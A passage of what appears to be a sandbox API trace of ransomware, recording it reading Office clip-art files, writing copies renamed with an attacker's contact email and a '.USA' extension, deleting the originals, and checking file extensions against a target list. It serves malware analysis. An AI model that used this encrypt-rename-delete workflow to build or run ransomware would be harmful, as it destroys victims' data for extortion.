lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x8e0, lpOverlapped=0x0) returned 1 [0267.814] ReadFile (in: hFile=0x37c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.814] WriteFile (in: hFile=0x348, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.814] SetEndOfFile (hFile=0x348) returned 1 [0267.915] CloseHandle (hObject=0x348) returned 1 [0267.915] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.915] SetEndOfFile (hFile=0x37c) returned 1 [0267.975] CloseHandle (hObject=0x37c) returned 1 [0267.976] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.017] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf")) returned 1 [0268.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0268.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0268.167] lstrlenW (lpString=".doc") returned 4 [0268.167] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.167] lstrlenW (lpString=".docx") returned 5 [0268.167] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0268.167] lstrlenW (lpString=".pdf") returned 4 [0268.167] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.167] lstrlenW (lpString=".xls") returned 4 [0268.167] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.167] lstrlenW (lpString=".xlsx") returned 5 [0268.167] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0268.167] lstrlenW (lpString=".ppt") returned 4 [0268.168] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0268.168] lstrlenW (lpString=".zip") returned 4 [0268.168] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.168] lstrlenW (lpString=".rar") returned 4 [0268.168] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.168] lstrlenW (lpString=".bz2") returned 4 [0268.168] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.168] lstrlenW (lpString=".7z") returned 3 [0268.168] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0268.168] lstrlenW (lpString=".dbf") returned 4 [0268.168] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0268.168] lstrlenW (lpString=".1cd") returned 4 [0268.168] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0268.168] lstrlenW (lpString=".jpg") returned 4 [0268.168] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0268.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0268.168] lstrlenW (lpString=".doc") returned 4 [0268.168] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.168] lstrlenW (lpString=".docx") returned 5 [0268.168] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0268.168] lstrlenW (lpString=".pdf") returned 4 [0268.168] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.168] lstrlenW (lpString=".xls") returned 4 [0268.168] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.169] lstrlenW (lpString=".xlsx") returned 5 [0268.169] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0268.169] lstrlenW (lpString=".ppt") returned 4 [0268.169] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0268.169] lstrlenW (lpString=".zip") returned 4 [0268.169] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.169] lstrlenW (lpString=".rar") returned 4 [0268.169] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.169] lstrlenW (lpString=".bz2") returned 4 [0268.169] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.169] lstrlenW (lpString=".7z") returned 3 [0268.169] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0268.169] lstrlenW (lpString=".dbf") returned 4 [0268.169] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0268.169] lstrlenW (lpString=".1cd") returned 4 [0268.169] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63 [0268.169] lstrlenW (lpString=".jpg") returned 4 [0268.169] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.169] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.170] lstrlenW (lpString="DD00117_.WMF") returned 12 [0268.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0268.170] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=31122) returned 1 [0268.171] CloseHandle (hObject=0x2ac) returned 1 [0268.171] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf")) returned 0x20 [0268.171] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0268.171] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.171] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0268.172] GetLastError () returned 0x0 [0268.172] ReadFile (in: hFile=0x2ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x7992, lpOverlapped=0x0) returned 1 [0268.174] WriteFile (in: hFile=0x2b4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x79a0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x79a0, lpOverlapped=0x0) returned 1 [0268.175] ReadFile (in: hFile=0x2ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.175] WriteFile (in: hFile=0x2b4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.175] SetEndOfFile (hFile=0x2b4) returned 1 [0268.175] CloseHandle (hObject=0x2b4) returned 1 [0268.175] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.175] SetEndOfFile (hFile=0x2ac) returned 1 [0268.177] CloseHandle (hObject=0x2ac) returned 1 [0268.177] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.177] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf")) returned 1 [0268.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0268.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0268.178] lstrlenW (lpString=".doc") returned 4 [0268.178] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.178] lstrlenW (lpString=".docx") returned 5 [0268.178] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.178] lstrlenW (lpString=".pdf") returned 4 [0268.178] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.178] lstrlenW (lpString=".xls") returned 4 [0268.178] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.178] lstrlenW (lpString=".xlsx") returned 5 [0268.178] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.178] lstrlenW (lpString=".ppt") returned 4 [0268.178] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0268.178] lstrlenW (lpString=".zip") returned 4 [0268.178] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.178] lstrlenW (lpString=".rar") returned 4 [0268.178] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.178] lstrlenW (lpString=".bz2") returned 4 [0268.178] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.178] lstrlenW (lpString=".7z") returned 3 [0268.178] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0268.178] lstrlenW (lpString=".dbf") returned 4 [0268.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0268.178] lstrlenW (lpString=".1cd") returned 4 [0268.178] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0268.179] lstrlenW (lpString=".jpg") returned 4 [0268.179] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0268.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0268.179] lstrlenW (lpString=".doc") returned 4 [0268.179] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.179] lstrlenW (lpString=".docx") returned 5 [0268.179] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.179] lstrlenW (lpString=".pdf") returned 4 [0268.179] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.179] lstrlenW (lpString=".xls") returned 4 [0268.179] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.179] lstrlenW (lpString=".xlsx") returned 5 [0268.179] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.179] lstrlenW (lpString=".ppt") returned 4 [0268.179] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0268.179] lstrlenW (lpString=".zip") returned 4 [0268.179] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.179] lstrlenW (lpString=".rar") returned 4 [0268.179] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.179] lstrlenW (lpString=".bz2") returned 4 [0268.179] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.179] lstrlenW (lpString=".7z") returned 3 [0268.179] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0268.180] lstrlenW (lpString=".dbf") returned 4 [0268.180] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0268.180] lstrlenW (lpString=".1cd") returned 4 [0268.180] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63 [0268.180] lstrlenW (lpString=".jpg") returned 4 [0268.180] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.180] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.180] lstrlenW (lpString="DD00121_.WMF") returned 12 [0268.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0268.181] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=8256) returned 1 [0268.181] CloseHandle (hObject=0x2ac) returned 1 [0268.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf")) returned 0x20 [0268.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0268.182] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.182] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0268.187] GetLastError () returned 0x0 [0268.187] ReadFile (in: hFile=0x2ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x2040, lpOverlapped=0x0) returned 1 [0268.189] WriteFile (in: hFile=0x348, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x2050, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x2050, lpOverlapped=0x0) returned 1 [0268.190] ReadFile (in: hFile=0x2ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.190] WriteFile (in: hFile=0x348, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.190] SetEndOfFile (hFile=0x348) returned 1 [0268.190] CloseHandle (hObject=0x348) returned 1 [0268.190] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.190] SetEndOfFile (hFile=0x2ac) returned 1 [0268.193] CloseHandle (hObject=0x2ac) returned 1 [0268.193] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.202] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf")) returned 1 [0268.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0268.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0268.203] lstrlenW (lpString=".doc") returned 4 [0268.203] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.203] lstrlenW (lpString=".docx") returned 5 [0268.203] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.203] lstrlenW (lpString=".pdf") returned 4 [0268.203] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.203] lstrlenW (lpString=".xls") returned 4 [0268.203] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.203] lstrlenW (lpString=".xlsx") returned 5 [0268.203] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.203] lstrlenW (lpString=".ppt") returned 4 [0268.203] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0268.203] lstrlenW (lpString=".zip") returned 4 [0268.203] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.203] lstrlenW (lpString=".rar") returned 4 [0268.203] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.203] lstrlenW (lpString=".bz2") returned 4 [0268.203] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.203] lstrlenW (lpString=".7z") returned 3 [0268.203] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0268.203] lstrlenW (lpString=".dbf") returned 4 [0268.203] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0268.203] lstrlenW (lpString=".1cd") returned 4 [0268.203] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0268.204] lstrlenW (lpString=".jpg") returned 4 [0268.204] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0268.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0268.204] lstrlenW (lpString=".doc") returned 4 [0268.204] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.204] lstrlenW (lpString=".docx") returned 5 [0268.204] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.204] lstrlenW (lpString=".pdf") returned 4 [0268.204] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.204] lstrlenW (lpString=".xls") returned 4 [0268.204] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.204] lstrlenW (lpString=".xlsx") returned 5 [0268.204] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.204] lstrlenW (lpString=".ppt") returned 4 [0268.204] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0268.204] lstrlenW (lpString=".zip") returned 4 [0268.204] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.204] lstrlenW (lpString=".rar") returned 4 [0268.204] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.204] lstrlenW (lpString=".bz2") returned 4 [0268.204] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.204] lstrlenW (lpString=".7z") returned 3 [0268.204] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0268.204] lstrlenW (lpString=".dbf") returned 4 [0268.204] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0268.205] lstrlenW (lpString=".1cd") returned 4 [0268.205] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 63 [0268.205] lstrlenW (lpString=".jpg") returned 4 [0268.205] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.205] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.205] lstrlenW (lpString="DD00255_.WMF") returned 12 [0268.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0268.247] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2690) returned 1 [0268.247] CloseHandle (hObject=0x390) returned 1 [0268.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf")) returned 0x20 [0268.348] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0268.349] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.349] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0268.372] GetLastError () returned 0x0 [0268.372] ReadFile (in: hFile=0x394, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0xa82, lpOverlapped=0x0) returned 1 [0268.373] WriteFile (in: hFile=0x348, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xa90, lpOverlapped=0x0) returned 1 [0268.374] ReadFile (in: hFile=0x394, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.374] WriteFile (in: hFile=0x348, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 